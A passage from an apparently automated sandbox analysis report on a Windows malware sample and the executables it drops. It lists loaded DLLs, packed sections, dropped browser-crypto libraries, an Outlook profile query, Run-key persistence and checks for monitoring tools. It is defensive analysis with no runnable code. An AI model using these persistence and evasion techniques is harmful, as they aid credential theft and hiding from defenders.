Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1012944001\e0da62c8af.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1012944001\e0da62c8af.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1012944001\e0da62c8af.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1012944001\e0da62c8af.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1012944001\e0da62c8af.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1012944001\e0da62c8af.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1012944001\e0da62c8af.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1012944001\e0da62c8af.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1012944001\e0da62c8af.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Section loaded: winmm.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: msedge.lnk.27.dr

LNK file: ..\..\..\..\..\msedge.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 5277184 > 1048576

Source: file.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x249000
Source: file.exe	Static PE information: Raw size of amfccvoo is bigger than: 0x100000 < 0x2bbc00

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1903696304.000000007013D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1903696304.000000007013D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.fc0000.0.unpack :EW;.rsrc:W;.idata :W;amfccvoo:EW;rdzlrlxp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;amfccvoo:EW;rdzlrlxp:EW;.taggant:EW;
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Unpacked PE file: 20.2.AAAAECGHCB.exe.540000.0.unpack :EW;.rsrc:W;.idata :W;uxwkwojh:EW;xuxxpxvl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uxwkwojh:EW;xuxxpxvl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 21.2.skotes.exe.240000.0.unpack :EW;.rsrc:W;.idata :W;uxwkwojh:EW;xuxxpxvl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uxwkwojh:EW;xuxxpxvl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 22.2.skotes.exe.240000.0.unpack :EW;.rsrc:W;.idata :W;uxwkwojh:EW;xuxxpxvl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uxwkwojh:EW;xuxxpxvl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 25.2.skotes.exe.240000.0.unpack :EW;.rsrc:W;.idata :W;uxwkwojh:EW;xuxxpxvl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uxwkwojh:EW;xuxxpxvl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Unpacked PE file: 27.2.qk4EiZw.exe.1c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kcsazwfy:EW;epcrslpk:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Unpacked PE file: 28.2.9faf801df7.exe.530000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bqbljxfp:EW;lbyqfoff:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bqbljxfp:EW;lbyqfoff:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Unpacked PE file: 29.2.0fb4fa91ba.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W;amfccvoo:EW;rdzlrlxp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;amfccvoo:EW;rdzlrlxp:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Unpacked PE file: 32.2.9faf801df7.exe.530000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bqbljxfp:EW;lbyqfoff:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bqbljxfp:EW;lbyqfoff:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 0fb4fa91ba.exe.25.dr	Static PE information: real checksum: 0x51091a should be: 0x50e3a0
Source: random[1].exe.25.dr	Static PE information: real checksum: 0x1cab4c should be: 0x1d156b
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x321d45 should be: 0x31df19
Source: skotes.exe.20.dr	Static PE information: real checksum: 0x321d45 should be: 0x31df19
Source: qk4EiZw[1].exe.25.dr	Static PE information: real checksum: 0x1b6a5e should be: 0x1a94f8
Source: qk4EiZw.exe.25.dr	Static PE information: real checksum: 0x1b6a5e should be: 0x1a94f8
Source: file.exe	Static PE information: real checksum: 0x51091a should be: 0x50e3a0
Source: random[1].exe0.25.dr	Static PE information: real checksum: 0x51091a should be: 0x50e3a0
Source: 9faf801df7.exe.25.dr	Static PE information: real checksum: 0x1cab4c should be: 0x1d156b
Source: AAAAECGHCB.exe.0.dr	Static PE information: real checksum: 0x321d45 should be: 0x31df19

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: amfccvoo
Source: file.exe	Static PE information: section name: rdzlrlxp
Source: file.exe	Static PE information: section name: .taggant
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name: uxwkwojh
Source: random[1].exe.0.dr	Static PE information: section name: xuxxpxvl
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: AAAAECGHCB.exe.0.dr	Static PE information: section name:
Source: AAAAECGHCB.exe.0.dr	Static PE information: section name: .idata
Source: AAAAECGHCB.exe.0.dr	Static PE information: section name: uxwkwojh
Source: AAAAECGHCB.exe.0.dr	Static PE information: section name: xuxxpxvl
Source: AAAAECGHCB.exe.0.dr	Static PE information: section name: .taggant
Source: skotes.exe.20.dr	Static PE information: section name:
Source: skotes.exe.20.dr	Static PE information: section name: .idata
Source: skotes.exe.20.dr	Static PE information: section name: uxwkwojh
Source: skotes.exe.20.dr	Static PE information: section name: xuxxpxvl
Source: skotes.exe.20.dr	Static PE information: section name: .taggant
Source: random[1].exe.25.dr	Static PE information: section name:
Source: random[1].exe.25.dr	Static PE information: section name: .idata
Source: random[1].exe.25.dr	Static PE information: section name:
Source: random[1].exe.25.dr	Static PE information: section name: bqbljxfp
Source: random[1].exe.25.dr	Static PE information: section name: lbyqfoff
Source: random[1].exe.25.dr	Static PE information: section name: .taggant
Source: 9faf801df7.exe.25.dr	Static PE information: section name:
Source: 9faf801df7.exe.25.dr	Static PE information: section name: .idata
Source: 9faf801df7.exe.25.dr	Static PE information: section name:
Source: 9faf801df7.exe.25.dr	Static PE information: section name: bqbljxfp
Source: 9faf801df7.exe.25.dr	Static PE information: section name: lbyqfoff
Source: 9faf801df7.exe.25.dr	Static PE information: section name: .taggant
Source: random[1].exe0.25.dr	Static PE information: section name:
Source: random[1].exe0.25.dr	Static PE information: section name: .idata
Source: random[1].exe0.25.dr	Static PE information: section name: amfccvoo
Source: random[1].exe0.25.dr	Static PE information: section name: rdzlrlxp
Source: random[1].exe0.25.dr	Static PE information: section name: .taggant
Source: 0fb4fa91ba.exe.25.dr	Static PE information: section name:
Source: 0fb4fa91ba.exe.25.dr	Static PE information: section name: .idata
Source: 0fb4fa91ba.exe.25.dr	Static PE information: section name: amfccvoo
Source: 0fb4fa91ba.exe.25.dr	Static PE information: section name: rdzlrlxp
Source: 0fb4fa91ba.exe.25.dr	Static PE information: section name: .taggant
Source: qk4EiZw[1].exe.25.dr	Static PE information: section name:
Source: qk4EiZw[1].exe.25.dr	Static PE information: section name: .idata
Source: qk4EiZw[1].exe.25.dr	Static PE information: section name:
Source: qk4EiZw[1].exe.25.dr	Static PE information: section name: kcsazwfy
Source: qk4EiZw[1].exe.25.dr	Static PE information: section name: epcrslpk
Source: qk4EiZw[1].exe.25.dr	Static PE information: section name: .taggant
Source: qk4EiZw.exe.25.dr	Static PE information: section name:
Source: qk4EiZw.exe.25.dr	Static PE information: section name: .idata
Source: qk4EiZw.exe.25.dr	Static PE information: section name:
Source: qk4EiZw.exe.25.dr	Static PE information: section name: kcsazwfy
Source: qk4EiZw.exe.25.dr	Static PE information: section name: epcrslpk
Source: qk4EiZw.exe.25.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Documents\AAAAECGHCB.exe	Code function: 20_2_0055D91C push ecx; ret	20_2_0055D92F
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Code function: 20_2_00551359 push es; ret	20_2_0055135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_0025D91C push ecx; ret	21_2_0025D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_0025D91C push ecx; ret	22_2_0025D92F

Source: random[1].exe.0.dr	Static PE information: section name: entropy: 7.0655055388596475
Source: AAAAECGHCB.exe.0.dr	Static PE information: section name: entropy: 7.0655055388596475
Source: skotes.exe.20.dr	Static PE information: section name: entropy: 7.0655055388596475
Source: random[1].exe.25.dr	Static PE information: section name: entropy: 7.981153665770958
Source: random[1].exe.25.dr	Static PE information: section name: bqbljxfp entropy: 7.954291520176544
Source: 9faf801df7.exe.25.dr	Static PE information: section name: entropy: 7.981153665770958
Source: 9faf801df7.exe.25.dr	Static PE information: section name: bqbljxfp entropy: 7.954291520176544
Source: qk4EiZw[1].exe.25.dr	Static PE information: section name: entropy: 7.964327563991748
Source: qk4EiZw[1].exe.25.dr	Static PE information: section name: kcsazwfy entropy: 7.953709762013856
Source: qk4EiZw.exe.25.dr	Static PE information: section name: entropy: 7.964327563991748
Source: qk4EiZw.exe.25.dr	Static PE information: section name: kcsazwfy entropy: 7.953709762013856

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\Documents\AAAAECGHCB.exe

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\Documents\AAAAECGHCB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1012942001\9faf801df7.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\AAAAECGHCB.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1012944001\e0da62c8af.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\qk4EiZw[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcruntime140[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9faf801df7.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0fb4fa91ba.exe

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\AAAAECGHCB.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1012933001\qk4EiZw.exe	Window searched: window name: PROCMON_WINDOW_CLASS
